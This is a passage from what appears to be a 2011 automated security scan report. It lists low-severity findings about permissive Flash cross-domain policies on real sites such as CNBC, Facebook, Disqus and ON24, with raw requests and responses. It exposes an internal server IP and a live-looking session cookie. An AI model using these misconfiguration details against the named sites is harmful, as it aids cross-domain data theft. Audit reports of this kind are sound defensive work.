<!-- http://stage.ticker.cnbc.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.87. http://developers.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.154.104
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.88. http://disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:32 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.89. http://edge.sapient.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sapient.com

Response

HTTP/1.0 200 OK
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:1edd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:32:33 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.90. http://event.on24.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://event.on24.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>
   
   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.91. https://event.on24.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://event.on24.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>
   
   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.92. http://executivevision.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://executivevision.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:29 GMT
Connection: close
Content-Length: 3839

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.93. http://js.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 15:30:15 GMT
Date: Tue, 06 Sep 2011 15:00:15 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.94. http://login.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.95. https://login.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:36 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.96. http://m.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS93eea98f293ea8fd633599e480cddfdc=u6gvdrmr9fm9tr67nrb374c6c3; path=/; domain=.cnbc.com
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/xml
Via: 1.1 aicache6
Content-Length: 255
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="m.cnbc.com" />
<allow-access-from domain="*.m.cnbc.com" />
...[SNIP]...

4.97. http://media.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Date: Tue, 06 Sep 2011 14:56:31 GMT
Connection: close
Cache-Control: public, max-age=900

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.98. http://msnbcmedia.msn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbcmedia.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbcmedia.msn.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:37 GMT
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Content-Type: text/xml
ETag: "0ff4d5ae31fcc1:0"
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Connection: close

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.99. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
